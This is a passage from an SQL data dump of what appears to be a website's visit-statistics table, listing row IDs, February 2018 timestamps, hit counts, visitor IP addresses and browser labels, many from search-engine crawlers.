,4,4,0,0,'91.196.178.80','chrome'),(210639,1519108967,1,1,0,0,'54.36.148.183','other'),(210640,1519109030,1,1,0,0,'54.36.148.63','other'),(210641,1519109118,1,1,0,0,'54.36.148.35','other'),(210642,1519109119,1,1,0,0,'217.69.133.5','other'),(210643,1519109256,1,1,0,0,'217.69.134.174','other'),(210644,1519109423,1,1,0,0,'54.36.148.175','other'),(210645,1519109568,1,1,0,0,'54.36.148.244','other'),(210646,1519109672,1,1,0,0,'54.36.148.125','other'),(210647,1519109723,1,1,0,0,'54.36.148.217','other'),(210648,1519109745,1,1,0,0,'66.249.66.74','chrome'),(210649,1519109781,1,1,0,0,'54.36.148.241','other'),(210650,1519109821,3,3,0,0,'91.196.178.36','chrome'),(210651,1519109822,1,1,0,0,'54.36.148.105','other'),(210652,1519109904,1,1,0,0,'54.36.149.35','other'),(210653,1519109972,1,1,0,0,'54.36.148.136','other'),(210654,1519110009,1,1,0,0,'54.36.148.162','other'),(210655,1519110060,2,2,0,0,'91.196.178.93','chrome'),(210656,1519110181,1,1,0,0,'54.36.149.83','other'),(210657,1519110537,1,1,0,0,'54.36.149.23','other'),(210658,1519110631,1,1,0,0,'91.196.178.6','chrome'),(210659,1519110685,1,1,0,0,'8.29.198.26','other'),(210660,1519110704,1,1,0,0,'54.36.148.33','other'),(210661,1519110847,1,1,0,0,'54.36.148.159','other'),(210662,1519110920,1,1,0,0,'195.10.210.70','chrome'),(210663,1519111003,1,1,0,0,'54.36.148.180','other'),(210664,1519111466,1,1,0,0,'54.36.148.60','other'),(210665,1519111554,1,1,0,0,'66.249.66.157','chrome'),(210666,1519111963,1,1,0,0,'54.36.148.13','other'),(210667,1519112026,1,0,1,0,'66.249.66.76',''),(210668,1519112441,1,1,0,0,'54.36.149.17','other'),(210669,1519112580,1,1,0,0,'195.10.210.70','chrome'),(210670,1519112583,2,2,0,0,'141.8.142.74','other'),(210671,1519112756,1,1,0,0,'207.46.13.7','other'),(210672,1519112833,1,1,0,0,'78.111.190.30','chrome'),(210673,1519112968,1,1,0,0,'54.36.149.101','other'),(210674,1519113210,1,1,0,0,'54.36.149.7','other'),(210675,1519113296,1,1,0,0,'54.36.148.27','other'),(210676,1519113623,1,1,0,0,'54.36.149.14','other'),(210677,1519113686,1,1,0,0,'54.36.148.47','other'),(210678,1519113701,1,1,0,0,'176.124.133.33','chrome'),(210679,1519113805,1,1,0,0,'54.36.148.178','other'),(210680,1519113812,1,1,0,0,'54.36.149.45','other'),(210681,1519114007,1,1,0,0,'54.36.148.49','other'),(210682,1519114065,1,1,0,0,'66.249.66.157','chrome'),(210683,1519114218,1,0,1,0,'66.249.66.155',''),(210684,1519114226,2,2,0,0,'91.196.178.57','chrome'),(210685,1519114417,1,1,0,0,'54.36.149.13','other'),(210686,1519114459,1,1,0,0,'54.36.149.34','other'),(210687,1519114626,1,1,0,0,'54.36.148.68','other'),(210688,1519114643,1,1,0,0,'54.36.148.163','other'),(210689,1519115209,1,1,0,0,'54.36.149.0','other'),(210690,1519115240,1,1,0,0,'54.36.148.211','other'),(210691,1519115336,1,1,0,0,'54.36.148.212','other'),(210692,1519116099,1,1,0,0,'54.36.148.255','other'),(210693,1519116197,1,1,0,0,'95.132.62.98','firefox'),(210694,1519116230,1,1,0,0,'54.36.149.86','other'),(210695,1519116344,1,1,0,0,'54.36.148.130','other'),(210696,1519116520,1,1,0,0,'54.36.148.135','other'),(210697,1519116764,1,1,0,0,'54.36.149.44','other'),(210698,1519116802,1,1,0,0,'95.133.28.16','chrome'),(210699,1519116812,1,1,0,0,'5.45.207.58','other'),(210700,1519117023,1,1,0,0,'54.36.148.167','other'),(210701,1519117147,1,1,0,0,'37.73.244.239','chrome'),(210702,1519117234,1,1,0,0,'54.36.148.138','other'),(210703,1519117270,1,1,0,0,'54.36.148.20','other'),(210704,1519117354,1,1,0,0,'54.36.148.27','other'),(210705,1519117433,3,3,0,0,'92.113.188.43','chrome'),(210706,1519117636,1,1,0,0,'54.36.148.110','other'),(210707,1519118050,1,1,0,0,'54.36.148.141','other'),(210708,1519118553,1,1,0,0,'54.36.148.242','other'),(210709,1519118670,4,4,0,0,'92.113.188.43','chrome'),(210710,1519119498,1,1,0,0,'54.36.148.136','other'),(210711,1519119506,2,2,0,0,'78.111.185.143','chrome'),(210712,1519119588,1,1,0,0,'54.36.148.122','other'),(210713,1519119594,1,1,0,0,'54.36.149.33','other'),(210714,1519119617,3,3,0,0,'92.113.188.43','chrome'),(210715,1519119696,1,1,0,0,'54.36.148.231','other'),(210716,1519119699,2,2,0,0,'195.10.210.70','chrome'),(210717,1519119719,1,1,0,0,'54.36.149.34','other'),(210718,1519119967,1,1,0,0,'54.36.148.224','other'),(210719,1519120293,1,1,0,0,'54.36.149.8','other'),(210720,1519120325,1,1,0,0,'54.36.148.156','other'),(210721,1519120540,1,1,0,0,'54.36.148.92','other'),(210722,1519120886,2,2,0,0,'91.196.178.93','chrome'),(210723,1519121081,1,1,0,0,'54.36.148.214','other'),(210724,1519121148,1,1,0,0,'54.36.149.3','other'),(210725,1519121199,1,1,0,0,'54.36.148.71','other'),(210726,1519121215,1,0,1,0,'66.249.66.155',''),(210727,1519121485,1,1,0,0,'217.69.133.237','other'),(210728,1519121509,1,1,0,0,'8.29.198.27','other'),(210729,1519121738,1,1,0,0,'178.154.171.88','other'),(210730,1519121794,1,1,0,0,'54.36.148.33','other'),(210731,1519121921,1,0,1,0,'66.249.66.156',''),(210732,1519122053,1,1,0,0,'54.36.148.196','other'),(210733,1519122117,1,1,0,0,'54.36.148.179','other'),(210734,1519122349,1,1,0,0,'54.36.148.241','other'),(210735,1519122376,1,1,0,0,'54.36.148.19','other'),(210736,1519122406,1,1,0,0,'54.36.149.85','other'),(210737,1519122437,1,1,0,0,'54.36.148.123','other'),(210738,1519122775,1,1,0,0,'54.36.148.50','other'),(210739,1519122881,3,3,0,0,'91.196.177.147','chrome'),(210740,1519122974,1,1,0,0,'54.36.149.27','other'),(210741,1519123159,1,1,0,0,'54.36.148.145','other'),(210742,1519123219,1,1,0,0,'178.154.171.88','other'),(210743,1519123249,1,1,0,0,'54.36.148.147','other'),(210744,1519123361,1,1,0,0,'54.36.149.92','other'),(210745,1519123394,1,1,0,0,'141.8.142.74','other'),(210746,1519123532,1,1,0,0,'54.36.148.63','other'),(210747,1519123672,1,1,0,0,'54.36.149.0','other'),(210748,1519123795,1,1,0,0,'54.36.149.53','other'),(210749,1519123817,1,1,0,0,'54.36.148.97','other'),(210750,1519123999,1,1,0,0,'54.36.149.86','other'),(210751,1519124300,1,1,0,0,'217.69.136.203','other'),(210752,1519124447,1,1,0,0,'54.36.149.74','other'),(210753,1519125019,3,3,0,0,'54.165.59.7','other'),(210754,1519125093,1,1,0,0,'54.36.148.151','other'),(210755,1519125325,1,1,0,0,'54.36.148.185','other'),(210756,1519125417,1,1,0,0,'54.36.149.30','other'),(210757,1519125814,1,1,0,0,'54.36.148.140','other'),(210758,1519125885,1,1,0,0,'54.36.148.152','other'),(210759,1519126021,1,1,0,0,'54.36.148.40','other'),(210760,1519126164,2,2,0,0,'54.165.59.7','other'),(210761,1519126191,2,2,0,0,'91.196.178.167','chrome'),(210762,1519126198,1,1,0,0,'157.55.39.29','other'),(210763,1519126217,1,1,0,0,'54.36.149.48','other'),(210764,1519126334,1,1,0,0,'54.36.148.252','other'),(210765,1519126352,1,1,0,0,'54.36.149.25','other'),(210766,1519126463,1,1,0,0,'54.36.148.176','other'),(210767,1519126982,2,2,0,0,'91.196.178.166','chrome'),(210768,1519127010,1,1,0,0,'54.36.148.93','other'),(210769,1519127163,1,1,0,0,'54.36.149.36','other'),(210770,1519127173,1,1,0,0,'54.36.148.157','other'),(210771,1519127276,1,1,0,0,'54.36.148.168','other'),(210772,1519127299,1,1,0,0,'54.36.148.154','other'),(210773,1519127618,1,1,0,0,'188.32.176.228','msie'),(210774,1519127685,1,1,0,0,'141.8.142.74','other'),(210775,1519128037,1,1,0,0,'54.36.148.72','other'),(210776,1519128096,1,1,0,0,'195.10.210.70','chrome'),(210777,1519128173,1,1,0,0,'54.36.148.224','other'),(210778,1519128404,1,1,0,0,'54.36.149.25','other'),(210779,1519128484,1,1,0,0,'46.201.134.15','firefox'),(210780,1519128552,1,1,0,0,'54.36.148.146','other'),(210781,1519128676,1,1,0,0,'54.165.59.7','other'),(210782,1519128812,1,1,0,0,'54.36.149.63','other'),(210783,1519129015,69,69,0,0,'94.199.151.22','other'),(210784,1519129264,1,1,0,0,'54.36.148.185','other'),(210785,1519129589,1,1,0,0,'178.154.171.88','other'),(210786,1519129751,1,1,0,0,'54.36.148.187','other'),(210787,1519129917,1,1,0,0,'54.36.148.74','other'),(210788,1519130020,1,1,0,0,'178.95.79.28','chrome'),(210789,1519130043,1,1,0,0,'54.36.148.137','other'),(210790,1519130046,1,1,0,0,'54.36.148.23','other'),(210791,1519130180,1,1,0,0,'95.132.24.153','chrome'),(210792,1519130278,1,1,0,0,'54.36.148.226','other'),(210793,1519130600,1,1,0,0,'54.36.148.99','other'),(210794,1519130795,5,5,0,0,'92.113.188.43','chrome'),(210795,1519131093,1,0,1,0,'66.249.66.157',''),(210796,1519131123,1,1,0,0,'54.36.148.137','other'),(210797,1519131309,1,1,0,0,'54.36.148.147','other'),(210798,1519131934,1,1,0,0,'54.36.149.74','other'),(210799,1519132061,1,1,0,0,'54.36.148.116','other'),(210800,1519132227,1,1,0,0,'54.36.149.63','other'),(210801,1519132319,1,1,0,0,'54.36.149.69','other'),(210802,1519132338,1,1,0,0,'8.29.198.26','other'),(210803,1519132475,1,1,0,0,'141.8.142.74','other'),(210804,1519132857,1,1,0,0,'157.55.39.29','other'),(210805,1519132872,1,1,0,0,'54.36.149.101','other'),(210806,1519133214,2,2,0,0,'91.196.178.161','chrome'),(210807,1519133287,1,1,0,0,'54.36.148.64','other'),(210808,1519133339,1,1,0,0,'54.36.148.226','other'),(210809,1519133610,1,1,0,0,'54.36.148.98','other'),(210810,1519133623,1,1,0,0,'54.36.148.163','other'),(210811,1519133705,1,1,0,0,'54.36.149.78','other'),(210812,1519133772,1,1,0,0,'195.201.33.105','other'),(210813,1519134093,2,2,0,0,'178.95.79.28','chrome'),(210814,1519134112,1,1,0,0,'54.36.149.105','other'),(210815,1519134192,1,1,0,0,'54.36.148.77','other'),(210816,1519134346,1,1,0,0,'54.36.149.72','other'),(210817,1519134432,1,1,0,0,'54.36.149.68','other'),(210818,1519134773,1,1,0,0,'54.36.148.186','other'),(210819,1519134776,1,0,1,0,'66.249.66.155',''),(210820,1519135039,1,1,0,0,'54.36.148.100','other'),(210821,1519135040,1,1,0,0,'54.36.148.150','other'),(210822,1519135048,1,1,0,0,'54.36.148.226','other'),(210823,1519135053,1,1,0,0,'91.196.177.8','chrome'),(210824,1519135124,1,1,0,0,'54.36.148.207','other'),(210825,1519135255,1,1,0,0,'54.36.148.110','other'),(210826,1519135260,1,1,0,0,'54.36.148.227','other'),(210827,1519135430,1,1,0,0,'54.36.149.92','other'),(210828,1519135437,2,2,0,0,'95.132.83.50','firefox'),(210829,1519135498,1,1,0,0,'54.36.148.182','other'),(210830,1519135985,1,1,0,0,'54.36.148.38','other'),(210831,1519136128,1,1,0,0,'54.36.148.147','other'),(210832,1519136615,1,1,0,0,'54.36.148.117','other'),(210833,1519136681,1,1,0,0,'217.69.143.53','other'),(210834,1519136984,1,1,0,0,'54.36.148.227','other'),(210835,1519136998,1,1,0,0,'54.36.148.191','other'),(210836,1519137142,1,1,0,0,'178.127.130.52','chrome'),(210837,1519137162,2,2,0,0,'91.196.178.166','chrome'),(210838,1519137188,1,1,0,0,'54.36.148.52','other'),(210839,1519137260,1,1,0,0,'54.36.148.61','other'),(210840,1519137383,1,1,0,0,'54.36.149.78','other'),(210841,1519137534,1,1,0,0,'54.36.148.27','other'),(210842,1519137649,1,1,0,0,'180.76.15.148','other'),(210843,1519137718,1,1,0,0,'54.36.148.129','other'),(210844,1519137912,1,1,0,0,'178.95.252.208','firefox'),(210845,1519138144,1,1,0,0,'54.36.149.42','other'),(210846,1519138265,1,1,0,0,'54.36.148.249','other'),(210847,1519138309,1,1,0,0,'54.36.148.217','other'),(210848,1519138355,1,1,0,0,'87.250.224.46','other'),(210849,1519138510,1,1,0,0,'54.36.148.151','other'),(210850,1519138693,1,1,0,0,'91.196.178.93','firefox'),(210851,1519138784,1,1,0,0,'91.196.178.129','chrome'),(210852,1519138837,1,1,0,0,'54.36.148.47','other'),(210853,1519138849,1,1,0,0,'54.36.149.18','other'),(210854,1519139128,1,1,0,0,'91.196.178.92','firefox'),(210855,1519139235,1,1,0,0,'91.196.178.166','other'),(210856,1519139286,1,1,0,0,'54.36.148.138','other'),(210857,1519139608,1,1,0,0,'54.36.148.89','other'),(210858,1519139712,1,1,0,0,'54.36.148.170','other'),(210859,1519139717,1,1,0,0,'40.77.167.33','other'),(210860,1519140327,1,1,0,0,'54.36.148.109','other'),(210861,1519140438,1,1,0,0,'178.154.171.88','other'),(210862,1519140642,1,1,0,0,'54.36.149.14','other'),(210863,1519141144,1,1,0,0,'40.77.167.33','other'),(210864,1519141160,1,1,0,0,'91.196.178.57','chrome'),(210865,1519141420,1,1,0,0,'54.36.148.206','other'),(210866,1519141746,1,1,0,0,'157.55.39.75','other'),(210867,1519141973,1,1,0,0,'54.36.148.117','other'),(210868,1519142086,1,1,0,0,'54.36.148.205','other'),(210869,1519142240,1,1,0,0,'54.36.148.105','other'),(210870,1519142283,2,2,0,0,'130.180.216.185','chrome'),(210871,1519142391,1,1,0,0,'188.230.43.254','other'),(210872,1519142486,1,1,0,0,'54.36.149.20','other'),(210873,1519142640,1,1,0,0,'54.36.149.57','other'),(210874,1519142664,1,1,0,0,'54.36.148.110','other'),(210875,1519142889,1,1,0,0,'54.36.148.249','other'),(210876,1519143163,1,1,0,0,'8.29.198.25','other'),(210877,1519143214,1,1,0,0,'54.36.148.226','other'),(210878,1519143376,1,1,0,0,'54.36.148.234','other'),(210879,1519143489,1,1,0,0,'54.36.149.16','other'),(210880,1519143654,1,1,0,0,'54.36.148.193','other'),(210881,1519143850,1,1,0,0,'54.36.149.36','other'),(210882,1519144340,1,1,0,0,'54.36.148.150','other'),(210883,1519144722,1,1,0,0,'54.36.148.133','other'),(210884,1519144763,1,1,0,0,'188.230.43.254','other'),(210885,1519144832,1,1,0,0,'54.36.148.251','other'),(210886,1519144885,1,1,0,0,'54.36.148.75','other'),(210887,1519144980,1,1,0,0,'54.36.149.59','other'),(210888,1519145114,1,1,0,0,'54.36.148.171','other'),(210889,1519145145,1,1,0,0,'162.210.196.97','other'),(210890,1519145351,1,1,0,0,'54.36.148.143','other'),(210891,1519145411,1,1,0,0,'54.36.148.195','other'),(210892,1519145733,1,1,0,0,'54.36.148.157','other'),(210893,1519145792,1,1,0,0,'54.36.149.38','other'),(210894,1519145933,1,1,0,0,'54.36.148.40','other'),(210895,1519146269,1,1,0,0,'54.36.148.101','other'),(210896,1519146386,1,1,0,0,'54.36.148.41','other'),(210897,1519146507,1,1,0,0,'54.36.148.121','other'),(210898,1519146541,1,1,0,0,'46.201.205.239','chrome'),(210899,1519146657,1,1,0,0,'54.36.149.6','other'),(210900,1519146885,1,1,0,0,'54.36.148.170','other'),(210901,1519146893,1,1,0,0,'188.230.43.254','other'),(210902,1519147156,1,1,0,0,'54.36.149.62','other'),(210903,1519147316,1,1,0,0,'54.36.148.210','other'),(210904,1519147376,1,1,0,0,'54.36.148.99','other'),(210905,1519147656,1,1,0,0,'54.36.148.26','other'),(210906,1519147674,1,1,0,0,'54.36.148.209','other'),(210907,1519147748,1,1,0,0,'217.69.133.15','other'),(210908,1519148029,1,1,0,0,'54.36.148.43','other'),(210909,1519148060,1,1,0,0,'91.209.11.236','other'),(210910,1519148131,1,1,0,0,'54.36.149.2','other'),(210911,1519148829,1,1,0,0,'54.36.148.170','other'),(210912,1519148892,1,1,0,0,'54.36.148.105','other'),(210913,1519148968,1,1,0,0,'188.230.43.254','other'),(210914,1519149520,1,1,0,0,'54.36.148.181','other'),(210915,1519149955,1,1,0,0,'54.36.148.163','other'),(210916,1519150213,1,1,0,0,'54.36.149.77','other'),(210917,1519150315,1,1,0,0,'180.76.15.11','other'),(210918,1519150416,1,1,0,0,'54.36.148.180','other'),(210919,1519150510,1,1,0,0,'54.36.148.188','other'),(210920,1519150656,1,1,0,0,'5.45.235.106','msie'),(210921,1519150657,1,1,0,0,'54.36.148.233','other'),(210922,1519151043,1,1,0,0,'54.36.149.103','other'),(210923,1519151056,1,1,0,0,'54.36.148.63','other'),(210924,1519151069,1,1,0,0,'54.36.148.145','other'),(210925,1519151128,1,1,0,0,'54.36.149.21','other'),(210926,1519151183,1,1,0,0,'54.36.149.56','other'),(210927,1519151184,2,2,0,0,'188.191.239.107','chrome'),(210928,1519151205,1,1,0,0,'207.46.13.60','other'),(210929,1519151364,1,1,0,0,'188.230.43.254','other'),(210930,1519151670,2,2,0,0,'91.196.178.46','chrome'),(210931,1519151673,1,1,0,0,'54.36.149.76','other'),(210932,1519151691,1,1,0,0,'54.36.148.51','other'),(210933,1519151812,1,1,0,0,'54.36.148.254','other'),(210934,1519151932,1,1,0,0,'54.36.148.224','other'),(210935,1519152236,1,1,0,0,'217.69.133.192','other'),(210936,1519152507,1,1,0,0,'54.36.149.72','other'),(210937,1519152731,1,1,0,0,'54.36.149.92','other'),(210938,1519152773,1,1,0,0,'54.36.148.245','other'),(210939,1519152866,1,1,0,0,'91.196.178.92','firefox'),(210940,1519152890,1,1,0,0,'54.36.148.102','other'),(210941,1519152951,1,1,0,0,'54.36.149.50','other'),(210942,1519153281,1,1,0,0,'54.36.149.100','other'),(210943,1519153538,1,1,0,0,'46.161.9.39','chrome'),(210944,1519153618,1,1,0,0,'217.69.143.56','other'),(210945,1519153773,1,1,0,0,'54.36.149.78','other'),(210946,1519153865,1,1,0,0,'54.36.148.221','other'),(210947,1519154002,1,1,0,0,'8.29.198.26','other'),(210948,1519154073,1,1,0,0,'54.36.148.21','other'),(210949,1519154085,1,1,0,0,'54.36.149.73','other'),(210950,1519154093,2,2,0,0,'92.113.188.43','chrome'),(210951,1519154461,1,1,0,0,'54.36.149.80','other'),(210952,1519154618,1,1,0,0,'54.36.149.88','other'),(210953,1519154647,1,1,0,0,'89.102.46.18','chrome'),(210954,1519154683,1,1,0,0,'54.36.148.39','other'),(210955,1519154707,1,1,0,0,'54.36.148.152','other'),(210956,1519154823,1,1,0,0,'157.55.39.75','other'),(210957,1519154866,1,1,0,0,'54.36.148.178','other'),(210958,1519155645,1,1,0,0,'54.36.148.245','other'),(210959,1519155657,2,2,0,0,'207.46.13.60','other'),(210960,1519156115,1,1,0,0,'54.36.149.7','other'),(210961,1519156329,1,1,0,0,'54.36.148.141','other'),(210962,1519156369,1,1,0,0,'54.36.149.38','other'),(210963,1519156372,1,1,0,0,'93.75.8.57','firefox'),(210964,1519157136,1,1,0,0,'54.36.148.103','other'),(210965,1519157322,1,1,0,0,'54.36.149.90','other'),(210966,1519157604,1,1,0,0,'54.36.148.161','other'),(210967,1519157732,1,1,0,0,'54.36.149.105','other'),(210968,1519158103,2,2,0,0,'54.36.148.166','other'),(210969,1519158165,1,1,0,0,'54.36.149.80','other'),(210970,1519158331,1,1,0,0,'54.36.148.110','other'),(210971,1519158352,2,2,0,0,'91.196.178.165','chrome'),(210972,1519158368,1,1,0,0,'141.8.142.74','other'),(210973,1519158369,1,1,0,0,'178.154.171.88','other'),(210974,1519158413,1,1,0,0,'54.36.148.151','other'),(210975,1519158598,1,1,0,0,'54.36.148.175','other'),(210976,1519158668,1,1,0,0,'54.36.148.255','other'),(210977,1519158704,1,1,0,0,'217.69.133.224','other'),(210978,1519158990,1,1,0,0,'54.36.149.15','other'),(210979,1519159151,2,2,0,0,'91.196.178.59','chrome'),(210980,1519159152,1,1,0,0,'54.36.149.56','other'),(210981,1519159163,1,1,0,0,'54.36.148.240','other'),(210982,1519159170,1,1,0,0,'54.36.148.21','other'),(210983,1519159281,1,1,0,0,'178.154.171.88','other'),(210984,1519159677,1,1,0,0,'54.36.148.56','other'),(210985,1519160240,1,1,0,0,'54.36.148.71','other'),(210986,1519160270,1,1,0,0,'157.55.39.29','other'),(210987,1519160360,1,1,0,0,'51.255.71.119','other'),(210988,1519160574,1,1,0,0,'54.36.148.162','other'),(210989,1519160633,1,1,0,0,'54.36.148.124','other'),(210990,1519160655,1,1,0,0,'91.196.178.166','chrome'),(210991,1519160657,1,1,0,0,'51.255.71.123','other'),(210992,1519161045,1,1,0,0,'141.8.142.74','other'),(210993,1519161048,1,1,0,0,'54.36.148.178','other'),(210994,1519161053,1,1,0,0,'141.105.64.97','firefox'),(210995,1519161162,1,1,0,0,'54.36.148.85','other'),(210996,1519161625,1,1,0,0,'87.250.224.46','other'),(210997,1519162044,1,1,0,0,'54.36.149.1','other'),(210998,1519162144,1,1,0,0,'54.36.149.71','other'),(210999,1519162317,1,1,0,0,'54.36.148.185','other'),(211000,1519162506,1,1,0,0,'54.36.149.83','other'),(211001,1519162823,1,1,0,0,'54.36.148.33','other'),(211002,1519162887,2,2,0,0,'54.36.148.68','other'),(211003,1519162890,1,1,0,0,'54.36.148.228','other'),(211004,1519163285,1,1,0,0,'91.196.178.169','chrome'),(211005,1519163325,1,1,0,0,'54.36.148.144','other'),(211006,1519163347,1,1,0,0,'54.36.149.26','other'),(211007,1519163677,1,1,0,0,'54.36.149.50','other'),(211008,1519163778,1,1,0,0,'54.36.148.30','other'),(211009,1519163971,1,1,0,0,'54.36.148.190','other'),(211010,1519164011,1,1,0,0,'54.36.148.186','other'),(211011,1519164040,1,1,0,0,'54.36.148.224','other'),(211012,1519164282,1,1,0,0,'54.36.148.165','other'),(211013,1519164567,1,1,0,0,'54.36.148.163','other'),(211014,1519164595,1,1,0,0,'54.36.148.62','other'),(211015,1519164836,1,1,0,0,'8.29.198.27','other'),(211016,1519164974,1,1,0,0,'141.8.142.74','other'),(211017,1519164981,1,1,0,0,'54.36.149.68','other'),(211018,1519165011,1,1,0,0,'54.36.149.34','other'),(211019,1519165226,1,1,0,0,'54.36.148.232','other'),(211020,1519165339,1,1,0,0,'54.36.148.116','other'),(211021,1519165501,1,1,0,0,'54.36.148.199','other'),(211022,1519165758,1,1,0,0,'54.36.149.18','other'),(211023,1519165957,1,1,0,0,'192.162.239.9','chrome'),(211024,1519165986,1,1,0,0,'54.36.149.102','other'),(211025,1519166102,1,1,0,0,'54.36.149.75','other'),(211026,1519166418,1,1,0,0,'54.36.149.63','other'),(211027,1519166541,1,1,0,0,'87.250.224.46','other'),(211028,1519166868,1,1,0,0,'37.9.113.182','other'),(211029,1519167127,1,1,0,0,'54.36.148.205','other'),(211030,1519167276,1,1,0,0,'54.36.148.61','other'),(211031,1519167405,1,1,0,0,'54.36.148.162','other'),(211032,1519167594,1,1,0,0,'217.69.133.230','other'),(211033,1519167663,1,1,0,0,'54.36.148.128','other'),(211034,1519167699,1,1,0,0,'54.36.148.65','other'),(211035,1519167842,1,1,0,0,'141.8.142.74','other'),(211036,1519167938,1,1,0,0,'176.193.120.114','firefox'),(211037,1519167953,1,1,0,0,'128.69.152.12','firefox'),(211038,1519167991,1,1,0,0,'54.36.148.73','other'),(211039,1519168194,1,1,0,0,'54.36.148.68','other'),(211040,1519168327,1,0,1,0,'66.249.66.73',''),(211041,1519168329,1,1,0,0,'54.36.148.134','other'),(211042,1519168413,1,1,0,0,'54.36.148.66','other'),(211043,1519168573,1,1,0,0,'54.36.148.110','other'),(211044,1519168618,1,0,1,0,'66.249.66.74',''),(211045,1519168835,1,1,0,0,'54.36.149.74','other'),(211046,1519168916,1,1,0,0,'54.36.148.187','other'),(211047,1519169203,1,1,0,0,'54.36.148.99','other'),(211048,1519169308,1,1,0,0,'54.36.149.25','other'),(211049,1519169449,1,1,0,0,'54.36.148.227','other'),(211050,1519169481,1,0,1,0,'66.249.66.75',''),(211051,1519169482,1,1,0,0,'54.36.148.16','other'),(211052,1519169485,1,1,0,0,'54.36.148.55','other'),(211053,1519169837,1,1,0,0,'54.36.148.215','other'),(211054,1519169849,1,1,0,0,'54.36.149.32','other'),(211055,1519169924,1,1,0,0,'54.36.148.97','other'),(211056,1519169925,1,1,0,0,'54.36.148.53','other'),(211057,1519169957,1,1,0,0,'40.77.167.169','other'),(211058,1519170031,1,1,0,0,'54.36.148.250','other'),(211059,1519170210,1,0,1,0,'66.249.66.74',''),(211060,1519170364,1,1,0,0,'40.77.167.170','other'),(211061,1519170380,1,1,0,0,'54.36.148.60','other'),(211062,1519170505,1,1,0,0,'54.36.148.213','other'),(211063,1519170765,1,1,0,0,'54.36.148.21','other'),(211064,1519170867,1,1,0,0,'54.36.148.240','other'),(211065,1519170928,1,0,1,0,'66.249.66.156',''),(211066,1519171153,1,1,0,0,'54.36.148.167','other'),(211067,1519171209,1,1,0,0,'54.36.148.191','other'),(211068,1519171293,1,0,1,0,'66.249.66.74',''),(211069,1519171432,1,1,0,0,'54.36.149.68','other'),(211070,1519171460,1,1,0,0,'54.36.149.64','other'),(211071,1519171559,1,1,0,0,'54.36.148.185','other'),(211072,1519171583,1,1,0,0,'54.36.148.186','other'),(211073,1519171718,1,1,0,0,'54.36.148.154','other'),(211074,1519171778,1,1,0,0,'54.36.148.221','other'),(211075,1519172208,1,1,0,0,'54.36.148.79','other'),(211076,1519172279,1,1,0,0,'54.36.148.105','other'),(211077,1519172293,1,1,0,0,'54.36.148.14','other'),(211078,1519172462,1,1,0,0,'54.36.149.67','other'),(211079,1519172520,1,1,0,0,'54.36.148.186','other'),(211080,1519172593,1,1,0,0,'54.36.148.208','other'),(211081,1519172635,1,1,0,0,'54.36.148.50','other'),(211082,1519172682,1,1,0,0,'54.36.148.138','other'),(211083,1519172971,1,1,0,0,'54.36.149.4','other'),(211084,1519173106,1,1,0,0,'54.36.148.121','other'),(211085,1519173218,1,1,0,0,'54.36.149.75','other'),(211086,1519173261,1,1,0,0,'54.36.148.18','other'),(211087,1519173339,1,1,0,0,'54.36.149.49','other'),(211088,1519173463,1,1,0,0,'54.36.149.8','other'),(211089,1519173565,1,1,0,0,'54.36.149.70','other'),(211090,1519173719,1,1,0,0,'54.36.148.147','other'),(211091,1519173759,1,1,0,0,'54.36.149.33','other'),(211092,1519173769,1,1,0,0,'54.36.148.122','other'),(211093,1519174161,1,1,0,0,'54.36.148.96','other'),(211094,1519174779,1,1,0,0,'54.36.148.204','other'),(211095,1519175663,1,1,0,0,'8.29.198.27','other'),(211096,1519175714,4,4,0,0,'69.30.198.178','other'),(211097,1519175719,1,0,1,0,'66.249.66.75',''),(211098,1519175790,1,1,0,0,'54.36.148.25','other'),(211099,1519175838,1,1,0,0,'54.36.148.166','other'),(211100,1519175863,1,1,0,0,'54.36.149.67','other'),(211101,1519175942,1,1,0,0,'54.36.148.86','other'),(211102,1519175979,1,1,0,0,'54.36.148.112','other'),(211103,1519176346,1,1,0,0,'54.36.148.161','other'),(211104,1519176349,1,1,0,0,'54.36.149.96','other'),(211105,1519176560,1,1,0,0,'54.36.148.94','other'),(211106,1519177158,1,1,0,0,'54.36.148.35','other'),(211107,1519177224,1,1,0,0,'54.36.148.93','other'),(211108,1519177280,1,1,0,0,'40.77.167.149','other'),(211109,1519177857,1,1,0,0,'34.227.93.13','other'),(211110,1519178278,1,1,0,0,'54.36.148.40','other'),(211111,1519178543,1,1,0,0,'54.36.148.201','other'),(211112,1519178617,1,1,0,0,'54.36.149.106','other'),(211113,1519179174,1,1,0,0,'54.36.148.39','other'),(211114,1519179356,2,2,0,0,'141.8.142.74','other'),(211115,1519179401,1,1,0,0,'54.36.148.67','other'),(211116,1519179515,1,0,1,0,'66.249.66.157',''),(211117,1519179562,1,1,0,0,'54.36.148.182','other'),(211118,1519179596,1,1,0,0,'54.36.149.47','other'),(211119,1519179597,1,1,0,0,'54.36.148.113','other'),(211120,1519179649,1,1,0,0,'54.36.148.134','other'),(211121,1519179705,1,1,0,0,'54.36.148.145','other'),(211122,1519179824,1,1,0,0,'54.36.148.160','other'),(211123,1519180038,1,1,0,0,'54.36.148.164','other'),(211124,1519180056,1,1,0,0,'54.36.148.92','other'),(211125,1519180152,1,1,0,0,'54.36.148.70','other'),(211126,1519180813,1,1,0,0,'54.36.148.207','other'),(211127,1519180968,1,1,0,0,'208.110.82.178','other'),(211128,1519181017,1,1,0,0,'54.36.148.138','other'),(211129,1519181070,1,1,0,0,'54.36.149.59','other'),(211130,1519181082,1,1,0,0,'54.36.149.52','other'),(211131,1519181097,1,1,0,0,'54.36.148.136','other'),(211132,1519181254,1,1,0,0,'54.36.149.32','other'),(211133,1519181428,1,1,0,0,'54.36.148.108','other'),(211134,1519181543,1,1,0,0,'40.77.167.149','other'),(211135,1519181634,1,1,0,0,'54.36.148.159','other'),(211136,1519181660,1,1,0,0,'54.36.148.168','other'),(211137,1519181732,1,1,0,0,'217.69.133.252','other'),(211138,1519181884,1,1,0,0,'54.36.148.216','other'),(211139,1519182216,1,1,0,0,'87.250.224.46','other'),(211140,1519182681,1,1,0,0,'54.36.148.199','other'),(211141,1519182783,1,1,0,0,'54.36.148.217','other'),(211142,1519182811,1,1,0,0,'54.36.148.102','other'),(211143,1519182945,1,1,0,0,'54.36.149.101','other'),(211144,1519183178,1,1,0,0,'54.36.149.84','other'),(211145,1519183301,1,0,1,0,'66.249.66.156',''),(211146,1519183356,1,1,0,0,'141.8.142.74','other'),(211147,1519183458,1,1,0,0,'54.36.148.100','other'),(211148,1519183490,1,1,0,0,'54.36.148.233','other'),(211149,1519183516,1,1,0,0,'54.36.148.183','other'),(211150,1519183706,1,1,0,0,'54.165.59.7','other'),(211151,1519183708,1,1,0,0,'54.36.148.31','other'),(